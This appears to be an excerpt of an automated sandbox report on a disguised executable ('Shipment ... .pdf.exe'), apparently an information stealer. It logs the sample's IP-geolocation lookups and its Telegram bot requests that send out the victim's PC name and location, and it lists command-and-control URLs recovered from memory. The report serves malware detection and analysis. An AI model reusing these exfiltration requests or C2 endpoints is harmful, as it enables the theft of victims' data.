                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49720 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.6:49734 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.190.181.4
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 20.198.119.84
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2015/12/2024%20/%2013:48:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20and%20Time:%2016/12/2024%20/%2009:08:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20226533%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: kashmirestore.com
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 14 Dec 2024 12:50:12 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 14 Dec 2024 12:50:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: MSBuild.exe, 00000009.00000002.3578857774.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: MSBuild.exe, 00000009.00000002.3575088087.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microso
                  Source: MSBuild.exe, 00000009.00000002.3575088087.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoHX
                  Source: MSBuild.exe, 00000009.00000002.3578857774.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kashmirestore.com
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2421064302.00000000032F7000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, FZcXKpA.exe, 0000000A.00000002.2539468876.0000000003317000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: Shipment 990847575203.pdf.exe, FZcXKpA.exe.0.drString found in binary or memory: http://tempuri.org/kviskotekaDbDataSet.xsdcIgra
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003081000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226533%0D%0ADate%20a
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: MSBuild.exe, 00000011.00000002.3578489712.0000000003218000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: MSBuild.exe, 00000011.00000002.3578489712.0000000003209000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en8
                  Source: MSBuild.exe, 00000011.00000002.3578489712.0000000003213000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: MSBuild.exe, 00000009.00000002.3578857774.0000000002992000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: Shipment 990847575203.pdf.exe, 00000000.00000002.2423614663.00000000042C9000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002922000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3573869658.0000000000430000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: MSBuild.exe, 00000011.00000002.3578489712.0000000003141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                  Source: MSBuild.exe, 00000009.00000002.3578857774.000000000294D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.0000000002992000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3578857774.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003168000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3578489712.0000000003141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.00000000040A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                  Source: MSBuild.exe, 00000009.00000002.3584071371.00000000038F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.3584071371.0000000003BE4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000011.00000002.3583881759.0000000004392000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                  Source: MSBuild.exe, 00000011.00000002.3578489712.000000000324A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                  Source: MSBuild.exe, 00000009.00000002.3578857774.0000000002A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                  Source: MSBuild.exe, 00000009.00000002.3578857774.0000000002A8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/p
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
